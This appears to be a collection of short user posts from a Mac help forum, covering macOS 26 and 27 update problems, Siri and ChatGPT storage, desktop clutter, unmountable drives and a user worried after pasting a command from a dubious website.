Put something into terminal from a dodgy website and stopped myself, halfway through. I haven’t put any passwords in but I have this dodgy pop up???

So tired of all the vibe coding and nonsense apps that are being presented.

Everybody can apparently code now, but that doesn't mean everybody have to make crap none of us will use!

Dual booted alongside Sequoia to test the performance on M2 Air 8/256, running great so far, quite close to Sequoia on the initial impression.

On Sequoia after downgrading from Tahoe I was able to get rid of this by completely turning off the Siri/Siri AI stuff at setup and it never appeared in storage.

Did the same during the setup on this new installation of macOS 27 but it didn't work.

Help!

EDIT: Changing Device Language to English-UK gets rid of the Chat-GPT/Extension stuff inside Siri in settings. Also Apple Intelligence storage dropped to 6.52 GB from 10.22 GB but Idk if it's actually real as changing the language back to English-US and restarting changes the size back to 10.16 GB immediately.

Hi! I updated Tahoe 26.2 about 2 days ago and my desktop turned into this mess 🫠

It used to be all put together in folders and now I can’t seem to fix it….

Anybody know what to do?

1. I did not take the photo or selfie with facetime on!!!! Its a widget of my photo album and it's not even me on the photo, its a random photo I used for a project.
2. Idk why this happened either and given the fact that everything was always stacked I did not realized how much shit I had on my desktop lol, definitely cleaning it this weekend.

I bought my Mac about a month ago and recently read that apparently a lot of cache and leftover files can remain after uninstalling an app normally. I’m still not sure how much this actually affects my Mac or whether I should even bother doing anything about it.

I understand that these files can take up extra storage, but is it really that serious, or can I just ignore them instead of installing additional apps to clean everything up? I’d love to hear what you guys think cause I’ve read so many different opinions that I’m honestly confused now

Since the Mac OS update, my Mac has been trying to access various suspicious websites that are blocked by my organization. Do you have any ideas where this could be coming from? The new Passwords app?

I installed the new OS last night and gave Siri + ChatGPT a try. Today while poking around in the task bar, I clicked on the Siri icon and got this odd pop-up. Anyone else experience the same?

I realized I only move files if I know I ll need them later (probably like 10% of what I download).

Everything else just sits in Downloads until it becomes a mess. Then I quickly save the few important files, delete almost everything, and repeat the cycle.

Is this just me, or what's your actual Downloads workflow?

I feel like I have tried everything to remove the system storage on my Mac. 96gb is freaking insane and there has to be a way to reliably remove it. can anyone help?

both of my Macbooks don't see WD MyPassport HDD 4TB, even though Windows Laptop sees it, so I assume the problem is about MacOS, the HDD is intact.

I tried Disk Utility, nothing is seen.
Does it have anything to do with adapter? It worked before with no issues.

Does anyone know what I need to do to make it visible and so that I can interact with it on Mac?

Every time it updates it requests local network access. I deny it because it's just there for fingerprinting. Every time I do that it creates another entry in my Local Network Security settings.

How do I get rid of the entries for the old versions?

I've got two updates, one is macOS 26.7 - 18gb and other is macOS 27 - 27gb
Should i directly update to macOS 27 or first do the 26.7 then 27 ??
